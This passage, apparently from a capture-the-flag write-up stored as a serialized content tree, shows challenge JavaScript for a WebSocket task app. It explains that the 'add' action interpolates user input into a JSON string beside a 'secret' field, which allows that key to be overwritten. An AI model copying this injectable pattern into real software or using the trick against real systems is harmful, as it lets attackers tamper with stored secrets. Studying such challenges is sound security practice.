if",{"type":33,"tag":128,"props":49928,"children":49929},{"style":312},[49930],{"type":38,"value":2852},{"type":33,"tag":128,"props":49932,"children":49933},{"style":306},[49934],{"type":38,"value":6566},{"type":33,"tag":128,"props":49936,"children":49937},{"style":300},[49938],{"type":38,"value":13595},{"type":33,"tag":128,"props":49940,"children":49941},{"style":523},[49942],{"type":38,"value":9774},{"type":33,"tag":128,"props":49944,"children":49945},{"style":312},[49946],{"type":38,"value":2966},{"type":33,"tag":128,"props":49948,"children":49949},{"style":312},[49950],{"type":38,"value":762},{"type":33,"tag":128,"props":49952,"children":49953},{"class":130,"line":11278},[49954,49959,49963,49967,49972,49976,49981,49985,49989,49993,49998,50002,50007,50011],{"type":33,"tag":128,"props":49955,"children":49956},{"style":306},[49957],{"type":38,"value":49958},"                        quote",{"type":33,"tag":128,"props":49960,"children":49961},{"style":312},[49962],{"type":38,"value":5657},{"type":33,"tag":128,"props":49964,"children":49965},{"style":676},[49966],{"type":38,"value":5710},{"type":33,"tag":128,"props":49968,"children":49969},{"style":140},[49970],{"type":38,"value":49971},"A wise man once said, \"the flag is 
",{"type":33,"tag":128,"props":49973,"children":49974},{"style":1576},[49975],{"type":38,"value":5720},{"type":33,"tag":128,"props":49977,"children":49978},{"style":140},[49979],{"type":38,"value":49980},"process",{"type":33,"tag":128,"props":49982,"children":49983},{"style":312},[49984],{"type":38,"value":215},{"type":33,"tag":128,"props":49986,"children":49987},{"style":140},[49988],{"type":38,"value":44351},{"type":33,"tag":128,"props":49990,"children":49991},{"style":312},[49992],{"type":38,"value":215},{"type":33,"tag":128,"props":49994,"children":49995},{"style":140},[49996],{"type":38,"value":49997},"FLAG",{"type":33,"tag":128,"props":49999,"children":50000},{"style":1576},[50001],{"type":38,"value":5730},{"type":33,"tag":128,"props":50003,"children":50004},{"style":140},[50005],{"type":38,"value":50006},"\".",{"type":33,"tag":128,"props":50008,"children":50009},{"style":676},[50010],{"type":38,"value":5739},{"type":33,"tag":128,"props":50012,"children":50013},{"style":312},[50014],{"type":38,"value":5676},{"type":33,"tag":128,"props":50016,"children":50017},{"class":130,"line":11334},[50018,50023,50027],{"type":33,"tag":128,"props":50019,"children":50020},{"style":312},[50021],{"type":38,"value":50022},"                    
}",{"type":33,"tag":128,"props":50024,"children":50025},{"style":1576},[50026],{"type":38,"value":14269},{"type":33,"tag":128,"props":50028,"children":50029},{"style":312},[50030],{"type":38,"value":762},{"type":33,"tag":128,"props":50032,"children":50033},{"class":130,"line":11375},[50034,50038,50042,50046,50050,50055,50059,50064,50068,50072,50076,50081,50085,50089,50093,50097,50101],{"type":33,"tag":128,"props":50035,"children":50036},{"style":306},[50037],{"type":38,"value":49958},{"type":33,"tag":128,"props":50039,"children":50040},{"style":312},[50041],{"type":38,"value":5657},{"type":33,"tag":128,"props":50043,"children":50044},{"style":306},[50045],{"type":38,"value":48876},{"type":33,"tag":128,"props":50047,"children":50048},{"style":312},[50049],{"type":38,"value":344},{"type":33,"tag":128,"props":50051,"children":50052},{"style":306},[50053],{"type":38,"value":50054},"Math",{"type":33,"tag":128,"props":50056,"children":50057},{"style":312},[50058],{"type":38,"value":215},{"type":33,"tag":128,"props":50060,"children":50061},{"style":135},[50062],{"type":38,"value":50063},"floor",{"type":33,"tag":128,"props":50065,"children":50066},{"style":312},[50067],{"type":38,"value":5566},{"type":33,"tag":128,"props":50069,"children":50070},{"style":306},[50071],{"type":38,"value":50054},{"type":33,"tag":128,"props":50073,"children":50074},{"style":312},[50075],{"type":38,"value":215},{"type":33,"tag":128,"props":50077,"children":50078},{"style":135},[50079],{"type":38,"value":50080},"random",{"type":33,"tag":128,"props":50082,"children":50083},{"style":312},[50084],{"type":38,"value":9376},{"type":33,"tag":128,"props":50086,"children":50087},{"style":300},[50088],{"type":38,"value":9826},{"type":33,"tag":128,"props":50090,"children":50091},{"style":306},[50092],{"type":38,"value":48876},{"type":33,"tag":128,"props":50094,"children":50095},{"style":312},[50096],{"type":38,"value":215},{"type":33,"tag":128,"props":50098,"children":50099},{"style":437},[50100],{"type":38
,"value":6643},{"type":33,"tag":128,"props":50102,"children":50103},{"style":312},[50104],{"type":38,"value":50105},")];\n",{"type":33,"tag":128,"props":50107,"children":50108},{"class":130,"line":11383},[50109],{"type":33,"tag":128,"props":50110,"children":50111},{"style":312},[50112],{"type":38,"value":50113},"                    }\n",{"type":33,"tag":128,"props":50115,"children":50116},{"class":130,"line":11392},[50117],{"type":33,"tag":128,"props":50118,"children":50119},{"emptyLinePlaceholder":896},[50120],{"type":38,"value":899},{"type":33,"tag":128,"props":50122,"children":50123},{"class":130,"line":11417},[50124,50129],{"type":33,"tag":128,"props":50125,"children":50126},{"style":1576},[50127],{"type":38,"value":50128},"                    try",{"type":33,"tag":128,"props":50130,"children":50131},{"style":312},[50132],{"type":38,"value":762},{"type":33,"tag":128,"props":50134,"children":50135},{"class":130,"line":11441},[50136,50141,50146,50150,50154,50158,50162,50166,50170,50174,50178],{"type":33,"tag":128,"props":50137,"children":50138},{"style":300},[50139],{"type":38,"value":50140},"                        const",{"type":33,"tag":128,"props":50142,"children":50143},{"style":306},[50144],{"type":38,"value":50145}," 
task",{"type":33,"tag":128,"props":50147,"children":50148},{"style":312},[50149],{"type":38,"value":5657},{"type":33,"tag":128,"props":50151,"children":50152},{"style":306},[50153],{"type":38,"value":4321},{"type":33,"tag":128,"props":50155,"children":50156},{"style":312},[50157],{"type":38,"value":215},{"type":33,"tag":128,"props":50159,"children":50160},{"style":135},[50161],{"type":38,"value":25933},{"type":33,"tag":128,"props":50163,"children":50164},{"style":312},[50165],{"type":38,"value":5566},{"type":33,"tag":128,"props":50167,"children":50168},{"style":306},[50169],{"type":38,"value":35934},{"type":33,"tag":128,"props":50171,"children":50172},{"style":312},[50173],{"type":38,"value":215},{"type":33,"tag":128,"props":50175,"children":50176},{"style":306},[50177],{"type":38,"value":2815},{"type":33,"tag":128,"props":50179,"children":50180},{"style":312},[50181],{"type":38,"value":5815},{"type":33,"tag":128,"props":50183,"children":50184},{"class":130,"line":48574},[50185,50190,50194,50199],{"type":33,"tag":128,"props":50186,"children":50187},{"style":306},[50188],{"type":38,"value":50189},"                        tasks",{"type":33,"tag":128,"props":50191,"children":50192},{"style":312},[50193],{"type":38,"value":215},{"type":33,"tag":128,"props":50195,"children":50196},{"style":135},[50197],{"type":38,"value":50198},"push",{"type":33,"tag":128,"props":50200,"children":50201},{"style":312},[50202],{"type":38,"value":48206},{"type":33,"tag":128,"props":50204,"children":50205},{"class":130,"line":48602},[50206,50211,50215,50219,50223,50228,50232,50236,50240,50244,50248,50252],{"type":33,"tag":128,"props":50207,"children":50208},{"style":437},[50209],{"type":38,"value":50210},"                            
title",{"type":33,"tag":128,"props":50212,"children":50213},{"style":312},[50214],{"type":38,"value":284},{"type":33,"tag":128,"props":50216,"children":50217},{"style":135},[50218],{"type":38,"value":48778},{"type":33,"tag":128,"props":50220,"children":50221},{"style":312},[50222],{"type":38,"value":5566},{"type":33,"tag":128,"props":50224,"children":50225},{"style":306},[50226],{"type":38,"value":50227},"task",{"type":33,"tag":128,"props":50229,"children":50230},{"style":312},[50231],{"type":38,"value":215},{"type":33,"tag":128,"props":50233,"children":50234},{"style":306},[50235],{"type":38,"value":776},{"type":33,"tag":128,"props":50237,"children":50238},{"style":312},[50239],{"type":38,"value":5584},{"type":33,"tag":128,"props":50241,"children":50242},{"style":306},[50243],{"type":38,"value":50145},{"type":33,"tag":128,"props":50245,"children":50246},{"style":312},[50247],{"type":38,"value":215},{"type":33,"tag":128,"props":50249,"children":50250},{"style":306},[50251],{"type":38,"value":46812},{"type":33,"tag":128,"props":50253,"children":50254},{"style":312},[50255],{"type":38,"value":50256},"),\n",{"type":33,"tag":128,"props":50258,"children":50259},{"class":130,"line":48667},[50260,50265,50269,50273,50277,50281,50285,50289,50293,50297,50301,50305],{"type":33,"tag":128,"props":50261,"children":50262},{"style":437},[50263],{"type":38,"value":50264},"                            
description",{"type":33,"tag":128,"props":50266,"children":50267},{"style":312},[50268],{"type":38,"value":284},{"type":33,"tag":128,"props":50270,"children":50271},{"style":135},[50272],{"type":38,"value":48778},{"type":33,"tag":128,"props":50274,"children":50275},{"style":312},[50276],{"type":38,"value":5566},{"type":33,"tag":128,"props":50278,"children":50279},{"style":306},[50280],{"type":38,"value":50227},{"type":33,"tag":128,"props":50282,"children":50283},{"style":312},[50284],{"type":38,"value":215},{"type":33,"tag":128,"props":50286,"children":50287},{"style":306},[50288],{"type":38,"value":12236},{"type":33,"tag":128,"props":50290,"children":50291},{"style":312},[50292],{"type":38,"value":5584},{"type":33,"tag":128,"props":50294,"children":50295},{"style":306},[50296],{"type":38,"value":50145},{"type":33,"tag":128,"props":50298,"children":50299},{"style":312},[50300],{"type":38,"value":215},{"type":33,"tag":128,"props":50302,"children":50303},{"style":306},[50304],{"type":38,"value":46812},{"type":33,"tag":128,"props":50306,"children":50307},{"style":312},[50308],{"type":38,"value":50256},{"type":33,"tag":128,"props":50310,"children":50311},{"class":130,"line":48675},[50312,50317,50321,50325,50329,50334,50338,50342,50346,50350],{"type":33,"tag":128,"props":50313,"children":50314},{"style":437},[50315],{"type":38,"value":50316},"                            
quote",{"type":33,"tag":128,"props":50318,"children":50319},{"style":312},[50320],{"type":38,"value":284},{"type":33,"tag":128,"props":50322,"children":50323},{"style":135},[50324],{"type":38,"value":48778},{"type":33,"tag":128,"props":50326,"children":50327},{"style":312},[50328],{"type":38,"value":5566},{"type":33,"tag":128,"props":50330,"children":50331},{"style":306},[50332],{"type":38,"value":50333},"quote",{"type":33,"tag":128,"props":50335,"children":50336},{"style":312},[50337],{"type":38,"value":5584},{"type":33,"tag":128,"props":50339,"children":50340},{"style":306},[50341],{"type":38,"value":50145},{"type":33,"tag":128,"props":50343,"children":50344},{"style":312},[50345],{"type":38,"value":215},{"type":33,"tag":128,"props":50347,"children":50348},{"style":306},[50349],{"type":38,"value":46812},{"type":33,"tag":128,"props":50351,"children":50352},{"style":312},[50353],{"type":38,"value":2427},{"type":33,"tag":128,"props":50355,"children":50356},{"class":130,"line":48683},[50357],{"type":33,"tag":128,"props":50358,"children":50359},{"style":312},[50360],{"type":38,"value":50361},"                        
});\n",{"type":33,"tag":128,"props":50363,"children":50364},{"class":130,"line":48691},[50365,50369,50373,50377,50381,50385],{"type":33,"tag":128,"props":50366,"children":50367},{"style":312},[50368],{"type":38,"value":50022},{"type":33,"tag":128,"props":50370,"children":50371},{"style":1576},[50372],{"type":38,"value":6855},{"type":33,"tag":128,"props":50374,"children":50375},{"style":312},[50376],{"type":38,"value":2852},{"type":33,"tag":128,"props":50378,"children":50379},{"style":306},[50380],{"type":38,"value":23474},{"type":33,"tag":128,"props":50382,"children":50383},{"style":312},[50384],{"type":38,"value":2966},{"type":33,"tag":128,"props":50386,"children":50387},{"style":312},[50388],{"type":38,"value":762},{"type":33,"tag":128,"props":50390,"children":50392},{"class":130,"line":50391},56,[50393,50398,50402,50406,50410,50414,50419,50423,50427,50431,50435,50439,50444,50448,50452,50456,50460],{"type":33,"tag":128,"props":50394,"children":50395},{"style":306},[50396],{"type":38,"value":50397},"                        console",{"type":33,"tag":128,"props":50399,"children":50400},{"style":312},[50401],{"type":38,"value":215},{"type":33,"tag":128,"props":50403,"children":50404},{"style":135},[50405],{"type":38,"value":13157},{"type":33,"tag":128,"props":50407,"children":50408},{"style":312},[50409],{"type":38,"value":5566},{"type":33,"tag":128,"props":50411,"children":50412},{"style":676},[50413],{"type":38,"value":5739},{"type":33,"tag":128,"props":50415,"children":50416},{"style":140},[50417],{"type":38,"value":50418},"Error parsing task 
",{"type":33,"tag":128,"props":50420,"children":50421},{"style":1576},[50422],{"type":38,"value":5720},{"type":33,"tag":128,"props":50424,"children":50425},{"style":140},[50426],{"type":38,"value":35934},{"type":33,"tag":128,"props":50428,"children":50429},{"style":312},[50430],{"type":38,"value":215},{"type":33,"tag":128,"props":50432,"children":50433},{"style":140},[50434],{"type":38,"value":2815},{"type":33,"tag":128,"props":50436,"children":50437},{"style":1576},[50438],{"type":38,"value":5730},{"type":33,"tag":128,"props":50440,"children":50441},{"style":140},[50442],{"type":38,"value":50443},": ",{"type":33,"tag":128,"props":50445,"children":50446},{"style":1576},[50447],{"type":38,"value":5720},{"type":33,"tag":128,"props":50449,"children":50450},{"style":140},[50451],{"type":38,"value":23474},{"type":33,"tag":128,"props":50453,"children":50454},{"style":1576},[50455],{"type":38,"value":5730},{"type":33,"tag":128,"props":50457,"children":50458},{"style":676},[50459],{"type":38,"value":5739},{"type":33,"tag":128,"props":50461,"children":50462},{"style":312},[50463],{"type":38,"value":5815},{"type":33,"tag":128,"props":50465,"children":50467},{"class":130,"line":50466},57,[50468],{"type":33,"tag":128,"props":50469,"children":50470},{"style":312},[50471],{"type":38,"value":50113},{"type":33,"tag":128,"props":50473,"children":50475},{"class":130,"line":50474},58,[50476],{"type":33,"tag":128,"props":50477,"children":50478},{"style":312},[50479],{"type":38,"value":39766},{"type":33,"tag":128,"props":50481,"children":50483},{"class":130,"line":50482},59,[50484,50488,50492,50496,50500,50504,50508,50512,50516,50520,50524,50528,50532,50536,50540,50544,50548,50552,50556,50560,50564,50568],{"type":33,"tag":128,"props":50485,"children":50486},{"style":306},[50487],{"type":38,"value":49536},{"type":33,"tag":128,"props":50489,"children":50490},{"style":312},[50491],{"type":38,"value":215},{"type":33,"tag":128,"props":50493,"children":50494},{"style":135},[50495],{"type":38,
"value":23433},{"type":33,"tag":128,"props":50497,"children":50498},{"style":312},[50499],{"type":38,"value":5566},{"type":33,"tag":128,"props":50501,"children":50502},{"style":306},[50503],{"type":38,"value":6301},{"type":33,"tag":128,"props":50505,"children":50506},{"style":312},[50507],{"type":38,"value":215},{"type":33,"tag":128,"props":50509,"children":50510},{"style":135},[50511],{"type":38,"value":49561},{"type":33,"tag":128,"props":50513,"children":50514},{"style":312},[50515],{"type":38,"value":5836},{"type":33,"tag":128,"props":50517,"children":50518},{"style":437},[50519],{"type":38,"value":5841},{"type":33,"tag":128,"props":50521,"children":50522},{"style":312},[50523],{"type":38,"value":284},{"type":33,"tag":128,"props":50525,"children":50526},{"style":1576},[50527],{"type":38,"value":5850},{"type":33,"tag":128,"props":50529,"children":50530},{"style":312},[50531],{"type":38,"value":5584},{"type":33,"tag":128,"props":50533,"children":50534},{"style":437},[50535],{"type":38,"value":14849},{"type":33,"tag":128,"props":50537,"children":50538},{"style":312},[50539],{"type":38,"value":284},{"type":33,"tag":128,"props":50541,"children":50542},{"style":676},[50543],{"type":38,"value":6739},{"type":33,"tag":128,"props":50545,"children":50546},{"style":140},[50547],{"type":38,"value":13526},{"type":33,"tag":128,"props":50549,"children":50550},{"style":676},[50551],{"type":38,"value":6040},{"type":33,"tag":128,"props":50553,"children":50554},{"style":312},[50555],{"type":38,"value":5584},{"type":33,"tag":128,"props":50557,"children":50558},{"style":437},[50559],{"type":38,"value":49842},{"type":33,"tag":128,"props":50561,"children":50562},{"style":312},[50563],{"type":38,"value":284},{"type":33,"tag":128,"props":50565,"children":50566},{"style":306},[50567],{"type":38,"value":49842},{"type":33,"tag":128,"props":50569,"children":50570},{"style":312},[50571],{"type":38,"value":14256},{"type":33,"tag":128,"props":50573,"children":50575},{"class":130,"line":50574},60
,[50576,50580,50584,50588,50592,50596],{"type":33,"tag":128,"props":50577,"children":50578},{"style":312},[50579],{"type":38,"value":49613},{"type":33,"tag":128,"props":50581,"children":50582},{"style":1576},[50583],{"type":38,"value":6855},{"type":33,"tag":128,"props":50585,"children":50586},{"style":312},[50587],{"type":38,"value":2852},{"type":33,"tag":128,"props":50589,"children":50590},{"style":306},[50591],{"type":38,"value":23474},{"type":33,"tag":128,"props":50593,"children":50594},{"style":312},[50595],{"type":38,"value":2966},{"type":33,"tag":128,"props":50597,"children":50598},{"style":312},[50599],{"type":38,"value":762},{"type":33,"tag":128,"props":50601,"children":50603},{"class":130,"line":50602},61,[50604,50608,50612,50616,50620,50624,50628,50632,50636,50640,50644,50648,50652,50656,50660,50664,50668,50672],{"type":33,"tag":128,"props":50605,"children":50606},{"style":306},[50607],{"type":38,"value":49536},{"type":33,"tag":128,"props":50609,"children":50610},{"style":312},[50611],{"type":38,"value":215},{"type":33,"tag":128,"props":50613,"children":50614},{"style":135},[50615],{"type":38,"value":23433},{"type":33,"tag":128,"props":50617,"children":50618},{"style":312},[50619],{"type":38,"value":5566},{"type":33,"tag":128,"props":50621,"children":50622},{"style":306},[50623],{"type":38,"value":6301},{"type":33,"tag":128,"props":50625,"children":50626},{"style":312},[50627],{"type":38,"value":215},{"type":33,"tag":128,"props":50629,"children":50630},{"style":135},[50631],{"type":38,"value":49561},{"type":33,"tag":128,"props":50633,"children":50634},{"style":312},[50635],{"type":38,"value":5836},{"type":33,"tag":128,"props":50637,"children":50638},{"style":437},[50639],{"type":38,"value":5841},{"type":33,"tag":128,"props":50641,"children":50642},{"style":312},[50643],{"type":38,"value":284},{"type":33,"tag":128,"props":50645,"children":50646},{"style":1576},[50647],{"type":38,"value":6721},{"type":33,"tag":128,"props":50649,"children":50650},{"style":312
},[50651],{"type":38,"value":5584},{"type":33,"tag":128,"props":50653,"children":50654},{"style":437},[50655],{"type":38,"value":14849},{"type":33,"tag":128,"props":50657,"children":50658},{"style":312},[50659],{"type":38,"value":284},{"type":33,"tag":128,"props":50661,"children":50662},{"style":676},[50663],{"type":38,"value":6739},{"type":33,"tag":128,"props":50665,"children":50666},{"style":140},[50667],{"type":38,"value":13526},{"type":33,"tag":128,"props":50669,"children":50670},{"style":676},[50671],{"type":38,"value":6040},{"type":33,"tag":128,"props":50673,"children":50674},{"style":312},[50675],{"type":38,"value":14256},{"type":33,"tag":128,"props":50677,"children":50679},{"class":130,"line":50678},62,[50680],{"type":33,"tag":128,"props":50681,"children":50682},{"style":312},[50683],{"type":38,"value":35996},{"type":33,"tag":128,"props":50685,"children":50687},{"class":130,"line":50686},63,[50688],{"type":33,"tag":128,"props":50689,"children":50690},{"style":312},[50691],{"type":38,"value":15318},{"type":33,"tag":128,"props":50693,"children":50695},{"class":130,"line":50694},64,[50696,50700],{"type":33,"tag":128,"props":50697,"children":50698},{"style":1576},[50699],{"type":38,"value":49730},{"type":33,"tag":128,"props":50701,"children":50702},{"style":312},[50703],{"type":38,"value":762},{"type":33,"tag":128,"props":50705,"children":50707},{"class":130,"line":50706},65,[50708,50712,50716,50720,50724,50728,50732,50736,50740,50744,50748,50752,50756,50760,50764,50768,50773,50777],{"type":33,"tag":128,"props":50709,"children":50710},{"style":306},[50711],{"type":38,"value":49152},{"type":33,"tag":128,"props":50713,"children":50714},{"style":312},[50715],{"type":38,"value":215},{"type":33,"tag":128,"props":50717,"children":50718},{"style":135},[50719],{"type":38,"value":23433},{"type":33,"tag":128,"props":50721,"children":50722},{"style":312},[50723],{"type":38,"value":5566},{"type":33,"tag":128,"props":50725,"children":50726},{"style":306},[50727],{"type":38,"
value":6301},{"type":33,"tag":128,"props":50729,"children":50730},{"style":312},[50731],{"type":38,"value":215},{"type":33,"tag":128,"props":50733,"children":50734},{"style":135},[50735],{"type":38,"value":49561},{"type":33,"tag":128,"props":50737,"children":50738},{"style":312},[50739],{"type":38,"value":5836},{"type":33,"tag":128,"props":50741,"children":50742},{"style":437},[50743],{"type":38,"value":5841},{"type":33,"tag":128,"props":50745,"children":50746},{"style":312},[50747],{"type":38,"value":284},{"type":33,"tag":128,"props":50749,"children":50750},{"style":1576},[50751],{"type":38,"value":6721},{"type":33,"tag":128,"props":50753,"children":50754},{"style":312},[50755],{"type":38,"value":5584},{"type":33,"tag":128,"props":50757,"children":50758},{"style":437},[50759],{"type":38,"value":14251},{"type":33,"tag":128,"props":50761,"children":50762},{"style":312},[50763],{"type":38,"value":284},{"type":33,"tag":128,"props":50765,"children":50766},{"style":676},[50767],{"type":38,"value":6739},{"type":33,"tag":128,"props":50769,"children":50770},{"style":140},[50771],{"type":38,"value":50772},"Invalid 
action",{"type":33,"tag":128,"props":50774,"children":50775},{"style":676},[50776],{"type":38,"value":6040},{"type":33,"tag":128,"props":50778,"children":50779},{"style":312},[50780],{"type":38,"value":14256},{"type":33,"tag":128,"props":50782,"children":50784},{"class":130,"line":50783},66,[50785],{"type":33,"tag":128,"props":50786,"children":50787},{"style":312},[50788],{"type":38,"value":15318},{"type":33,"tag":128,"props":50790,"children":50792},{"class":130,"line":50791},67,[50793],{"type":33,"tag":128,"props":50794,"children":50795},{"style":312},[50796],{"type":38,"value":13745},{"type":33,"tag":128,"props":50798,"children":50800},{"class":130,"line":50799},68,[50801],{"type":33,"tag":128,"props":50802,"children":50803},{"style":312},[50804],{"type":38,"value":9876},{"type":33,"tag":128,"props":50806,"children":50808},{"class":130,"line":50807},69,[50809],{"type":33,"tag":128,"props":50810,"children":50811},{"emptyLinePlaceholder":896},[50812],{"type":38,"value":899},{"type":33,"tag":128,"props":50814,"children":50816},{"class":130,"line":50815},70,[50817,50821,50825,50829,50833,50837,50841,50845,50850,50854,50858],{"type":33,"tag":128,"props":50818,"children":50819},{"style":437},[50820],{"type":38,"value":48697},{"type":33,"tag":128,"props":50822,"children":50823},{"style":312},[50824],{"type":38,"value":215},{"type":33,"tag":128,"props":50826,"children":50827},{"style":437},[50828],{"type":38,"value":48706},{"type":33,"tag":128,"props":50830,"children":50831},{"style":312},[50832],{"type":38,"value":5657},{"type":33,"tag":128,"props":50834,"children":50835},{"style":312},[50836],{"type":38,"value":2852},{"type":33,"tag":128,"props":50838,"children":50839},{"style":306},[50840],{"type":38,"value":40700},{"type":33,"tag":128,"props":50842,"children":50843},{"style":312},[50844],{"type":38,"value":5584},{"type":33,"tag":128,"props":50846,"children":50847},{"style":306},[50848],{"type":38,"value":50849}," 
session",{"type":33,"tag":128,"props":50851,"children":50852},{"style":312},[50853],{"type":38,"value":2966},{"type":33,"tag":128,"props":50855,"children":50856},{"style":312},[50857],{"type":38,"value":5625},{"type":33,"tag":128,"props":50859,"children":50860},{"style":312},[50861],{"type":38,"value":762},{"type":33,"tag":128,"props":50863,"children":50865},{"class":130,"line":50864},71,[50866,50871,50875,50880],{"type":33,"tag":128,"props":50867,"children":50868},{"style":306},[50869],{"type":38,"value":50870},"    db",{"type":33,"tag":128,"props":50872,"children":50873},{"style":312},[50874],{"type":38,"value":5657},{"type":33,"tag":128,"props":50876,"children":50877},{"style":306},[50878],{"type":38,"value":50879}," database",{"type":33,"tag":128,"props":50881,"children":50882},{"style":312},[50883],{"type":38,"value":5676},{"type":33,"tag":128,"props":50885,"children":50887},{"class":130,"line":50886},72,[50888,50892,50896,50900],{"type":33,"tag":128,"props":50889,"children":50890},{"style":306},[50891],{"type":38,"value":49024},{"type":33,"tag":128,"props":50893,"children":50894},{"style":312},[50895],{"type":38,"value":5657},{"type":33,"tag":128,"props":50897,"children":50898},{"style":306},[50899],{"type":38,"value":50849},{"type":33,"tag":128,"props":50901,"children":50902},{"style":312},[50903],{"type":38,"value":5676},{"type":33,"tag":128,"props":50905,"children":50907},{"class":130,"line":50906},73,[50908,50912,50916],{"type":33,"tag":128,"props":50909,"children":50910},{"style":1576},[50911],{"type":38,"value":6810},{"type":33,"tag":128,"props":50913,"children":50914},{"style":306},[50915],{"type":38,"value":48967},{"type":33,"tag":128,"props":50917,"children":50918},{"style":312},[50919],{"type":38,"value":5676},{"type":33,"tag":128,"props":50921,"children":50923},{"class":130,"line":50922},74,[50924],{"type":33,"tag":128,"props":50925,"children":50926},{"style":312},[50927],{"type":38,"value":9876},{"type":33,"tag":47,"props":50929,"children":50930},{
},[50931,50933,50938,50940,50945,50947,50953,50955,50960,50962,50967],{"type":38,"value":50932},"We need to concentrate on the ",{"type":33,"tag":105,"props":50934,"children":50936},{"className":50935},[],[50937],{"type":38,"value":49388},{"type":38,"value":50939}," action. The ",{"type":33,"tag":105,"props":50941,"children":50943},{"className":50942},[],[50944],{"type":38,"value":49388},{"type":38,"value":50946}," action will add a task to the database. The task is ",{"type":33,"tag":105,"props":50948,"children":50950},{"className":50949},[],[50951],{"type":38,"value":50952},"JSON.stringify",{"type":38,"value":50954}," and stored in the ",{"type":33,"tag":105,"props":50956,"children":50958},{"className":50957},[],[50959],{"type":38,"value":2815},{"type":38,"value":50961}," column, and there is no protection against long strings, so we can overwrite the ",{"type":33,"tag":105,"props":50963,"children":50965},{"className":50964},[],[50966],{"type":38,"value":46812},{"type":38,"value":50968}," key.",{"type":33,"tag":114,"props":50970,"children":50971},{"lang":5526},[50972],{"type":33,"tag":119,"props":50973,"children":50975},{"code":50974,"language":5526,"meta":8,"className":5530,"style":8},"if (data.action === 'add') {\n    try {\n        await db.addTask(userId, `{\"title\":\"${data.title}\",\"description\":\"${data.description}\",\"secret\":\"${secret}\"}`);\n        ws.send(JSON.stringify({ success: true, action: 'add' }));\n    } catch (e) {\n        ws.send(JSON.stringify({ success: false, action: 'add' }));\n    
}\n}\n",[50976],{"type":33,"tag":105,"props":50977,"children":50978},{"__ignoreMap":8},[50979,51026,51037,51148,51224,51251,51326,51333],{"type":33,"tag":128,"props":50980,"children":50981},{"class":130,"line":131},[50982,50986,50990,50994,50998,51002,51006,51010,51014,51018,51022],{"type":33,"tag":128,"props":50983,"children":50984},{"style":1576},[50985],{"type":38,"value":10991},{"type":33,"tag":128,"props":50987,"children":50988},{"style":312},[50989],{"type":38,"value":2852},{"type":33,"tag":128,"props":50991,"children":50992},{"style":306},[50993],{"type":38,"value":2815},{"type":33,"tag":128,"props":50995,"children":50996},{"style":312},[50997],{"type":38,"value":215},{"type":33,"tag":128,"props":50999,"children":51000},{"style":306},[51001],{"type":38,"value":12513},{"type":33,"tag":128,"props":51003,"children":51004},{"style":300},[51005],{"type":38,"value":13595},{"type":33,"tag":128,"props":51007,"children":51008},{"style":676},[51009],{"type":38,"value":6739},{"type":33,"tag":128,"props":51011,"children":51012},{"style":140},[51013],{"type":38,"value":49388},{"type":33,"tag":128,"props":51015,"children":51016},{"style":676},[51017],{"type":38,"value":6040},{"type":33,"tag":128,"props":51019,"children":51020},{"style":312},[51021],{"type":38,"value":2966},{"type":33,"tag":128,"props":51023,"children":51024},{"style":312},[51025],{"type":38,"value":762},{"type":33,"tag":128,"props":51027,"children":51028},{"class":130,"line":362},[51029,51033],{"type":33,"tag":128,"props":51030,"children":51031},{"style":1576},[51032],{"type":38,"value":16034},{"type":33,"tag":128,"props":51034,"children":51035},{"style":312},[51036],{"type":38,"value":762},{"type":33,"tag":128,"props":51038,"children":51039},{"class":130,"line":403},[51040,51044,51048,51052,51056,51060,51064,51068,51072,51076,51080,51084,51088,51092,51096,51100,51104,51108,51112,51116,51120,51124,51128,51132,51136,51140,51144],{"type":33,"tag":128,"props":51041,"children":51042},{"style":1576},[51043],{"t
ype":38,"value":17718},{"type":33,"tag":128,"props":51045,"children":51046},{"style":306},[51047],{"type":38,"value":46507},{"type":33,"tag":128,"props":51049,"children":51050},{"style":312},[51051],{"type":38,"value":215},{"type":33,"tag":128,"props":51053,"children":51054},{"style":135},[51055],{"type":38,"value":49432},{"type":33,"tag":128,"props":51057,"children":51058},{"style":312},[51059],{"type":38,"value":5566},{"type":33,"tag":128,"props":51061,"children":51062},{"style":306},[51063],{"type":38,"value":6566},{"type":33,"tag":128,"props":51065,"children":51066},{"style":312},[51067],{"type":38,"value":5584},{"type":33,"tag":128,"props":51069,"children":51070},{"style":676},[51071],{"type":38,"value":5710},{"type":33,"tag":128,"props":51073,"children":51074},{"style":140},[51075],{"type":38,"value":49453},{"type":33,"tag":128,"props":51077,"children":51078},{"style":1576},[51079],{"type":38,"value":5720},{"type":33,"tag":128,"props":51081,"children":51082},{"style":140},[51083],{"type":38,"value":2815},{"type":33,"tag":128,"props":51085,"children":51086},{"style":312},[51087],{"type":38,"value":215},{"type":33,"tag":128,"props":51089,"children":51090},{"style":140},[51091],{"type":38,"value":776},{"type":33,"tag":128,"props":51093,"children":51094},{"style":1576},[51095],{"type":38,"value":5730},{"type":33,"tag":128,"props":51097,"children":51098},{"style":140},[51099],{"type":38,"value":49478},{"type":33,"tag":128,"props":51101,"children":51102},{"style":1576},[51103],{"type":38,"value":5720},{"type":33,"tag":128,"props":51105,"children":51106},{"style":140},[51107],{"type":38,"value":2815},{"type":33,"tag":128,"props":51109,"children":51110},{"style":312},[51111],{"type":38,"value":215},{"type":33,"tag":128,"props":51113,"children":51114},{"style":140},[51115],{"type":38,"value":12236},{"type":33,"tag":128,"props":51117,"children":51118},{"style":1576},[51119],{"type":38,"value":5730},{"type":33,"tag":128,"props":51121,"children":51122},{"style":140},[5112
3],{"type":38,"value":49503},{"type":33,"tag":128,"props":51125,"children":51126},{"style":1576},[51127],{"type":38,"value":5720},{"type":33,"tag":128,"props":51129,"children":51130},{"style":140},[51131],{"type":38,"value":46812},{"type":33,"tag":128,"props":51133,"children":51134},{"style":1576},[51135],{"type":38,"value":5730},{"type":33,"tag":128,"props":51137,"children":51138},{"style":140},[51139],{"type":38,"value":49520},{"type":33,"tag":128,"props":51141,"children":51142},{"style":676},[51143],{"type":38,"value":5739},{"type":33,"tag":128,"props":51145,"children":51146},{"style":312},[51147],{"type":38,"value":5815},{"type":33,"tag":128,"props":51149,"children":51150},{"class":130,"line":739},[51151,51156,51160,51164,51168,51172,51176,51180,51184,51188,51192,51196,51200,51204,51208,51212,51216,51220],{"type":33,"tag":128,"props":51152,"children":51153},{"style":306},[51154],{"type":38,"value":51155},"        